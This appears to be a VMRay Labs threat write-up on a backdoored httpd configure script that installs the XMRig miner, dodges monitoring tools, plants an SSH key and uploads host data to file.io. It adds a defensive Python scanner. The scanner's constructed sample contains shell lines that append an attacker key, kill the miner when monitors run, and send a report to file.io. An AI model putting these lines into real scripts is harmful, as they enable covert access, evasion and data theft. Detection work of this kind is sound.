Backdoored configuration script waits until user is inactive (!) to run Linux malware

VMRay Labs has found a backdoored build configuration script for httpd designed to drop and run the XMRig malware to mine Monero. ⛏️

⏳ Surprisingly, the script waits until the user has been inactive for at least a minute before starting the crypto-miner.

🔍 It also watches for resource-monitoring tools such as htop, nmon, or iostat and, if one is running, kills the resource-heavy XMRig process to avoid being caught. To maintain access, the sample adds the attackers’ public key to the “.ssh/authorized_keys” file, letting them re-enter the compromised machine without a password.

Note: the official httpd configuration script from Apache is NOT backdoored. This is a custom modification by threat actors, who likely distribute their own backdoored httpd source code to their victims.

0 / 62 detections on VirusTotal

In a nutshell:

  • Backdoored “configure” script → shell script → daemon → XMRig
  • Watches for these processes and kills the miner if any is present: top, htop, atop, mate-system-mon, iostat, mpstat, sar, glances, dstat, nmon, vmstat, ps
  • Collects information about the hardware (cpuinfo, meminfo, os-release, machine-id, etc.) and about files in the home directory every 12h
  • Uploads the collected information to file.io with an expiry of ten days
  • Shows a fake error message about a missing “libnetauth”, which does not appear to be a real library
  • Installs its own SSH authorized key

Our analysis report covers a compound sample submission that executes the first two shell-script payloads.
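As an added defender-side check (example code written for this post, not VMRay's detection logic and not the sample's own code), the function below scans a `configure` script for the indicators listed above: writes to SSH authorized_keys, uploads to file.io, the fake libnetauth error, and polling for the watched resource monitors. The two input fragments are constructed for the demonstration; the names KEY, REPORT and MINER_PID in them are placeholders.

```python
import re

# Process names the sample watches for (list taken from the write-up above).
WATCHED_TOOLS = {
    "top", "htop", "atop", "mate-system-mon", "iostat", "mpstat",
    "sar", "glances", "dstat", "nmon", "vmstat", "ps",
}

# Indicators described in the write-up: (finding label, pattern).
RULES = [
    ("writes SSH authorized_keys (persistence)", re.compile(r"authorized_keys")),
    ("uploads data to file.io (exfiltration)", re.compile(r"https?://(www\.)?file\.io", re.I)),
    ("fake 'libnetauth' error message (decoy)", re.compile(r"libnetauth")),
]

# Commands a script would use to look up or kill a process.
PROC_CMDS = re.compile(r"\b(pgrep|pidof|killall|kill|ps)\b")

def watched_tool_hits(text: str) -> set[str]:
    """Watched process names appearing on a line that also calls a
    process lookup/kill command; a genuine configure has no reason to."""
    hits = set()
    for line in text.splitlines():
        if PROC_CMDS.search(line):
            hits.update(t for t in re.findall(r"[A-Za-z][\w-]*", line)
                        if t in WATCHED_TOOLS)
    return hits

def audit_configure(text: str) -> list[str]:
    """Return human-readable findings; an empty list means no indicator hit."""
    findings = [label for label, rx in RULES if rx.search(text)]
    tools = watched_tool_hits(text)
    if len(tools) >= 3:  # threshold keeps a lone "checking for ps" from raising noise
        findings.append("polls for resource monitors: " + ", ".join(sorted(tools)))
    return findings

# Constructed samples (not the real sample's code): a benign configure
# fragment and one mimicking the behaviours listed above.
BENIGN = "checking for gcc... gcc\nac_cv_prog_CC=gcc\n"
SUSPICIOUS = (
    'cat "$KEY" >> "$HOME/.ssh/authorized_keys"\n'
    'for p in top htop atop iostat nmon; do pgrep -x "$p" && kill "$MINER_PID"; done\n'
    'curl -s -F "file=@$REPORT" https://file.io/\n'
    'echo "configure: error: libnetauth not found"\n'
)

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, "->", audit_configure(text) or "clean")
```

Run it against an extracted source tarball's `configure` before building; any finding means the script differs from what upstream ships and should be diffed against the official release.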

Dive deeper into the report

Sample SHA256:

901d7698b77d4a7cd1a7db3ea61bf866dcee77e677761f9d1ba6d193837e5447

See why we think this is malicious in plain language.

See the whole path of the sample’s execution

Map the malicious activities on the MITRE ATT&CK Framework

Explore detailed information on the IP addresses, URLs and DNS, including function logs and PCAP Streams

Download the IOCs and artifacts to have a clear picture of the threat.

Download the files that the malware downloads, drops or modifies.

Explore how you can use these insights
